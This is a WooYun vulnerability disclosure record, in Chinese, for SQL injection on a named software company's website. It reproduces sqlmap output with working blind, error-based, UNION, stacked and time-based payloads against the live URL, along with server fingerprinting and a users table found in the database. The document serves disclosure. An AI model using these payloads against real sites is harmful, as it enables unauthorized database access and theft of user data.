乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-24: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-08: 厂商已经主动忽略漏洞,细节向公众公开
金米软件网站存在SQL注入
注入点
http://www.jmtcsoft.com/list.aspx?group=4
注入证明
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: group Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: group=4' AND 8227=8227 AND 'AYqw'='AYqw Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: group=4' AND 6451=CONVERT(INT,(CHAR(58)+CHAR(103)+CHAR(118)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6451=6451) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(102)+CHAR(112)+CHAR(119)+CHAR(58))) AND 'aECu'='aECu Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: group=4' UNION ALL SELECT CHAR(58)+CHAR(103)+CHAR(118)+CHAR(98)+CHAR(58)+CHAR(103)+CHAR(104)+CHAR(80)+CHAR(68)+CHAR(66)+CHAR(77)+CHAR(100)+CHAR(112)+CHAR(84)+CHAR(83)+CHAR(58)+CHAR(102)+CHAR(112)+CHAR(119)+CHAR(58), NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: group=4'; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: group=4' WAITFOR DELAY '0:0:5'-----[21:16:37] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008Database: JMWebSite+--------------+---------+| Table | Entries |+--------------+---------+| dbo.dt_Users | 141 |+--------------+---------+
test
未能联系到厂商或者厂商积极拒绝
漏洞Rank:8 (WooYun评价)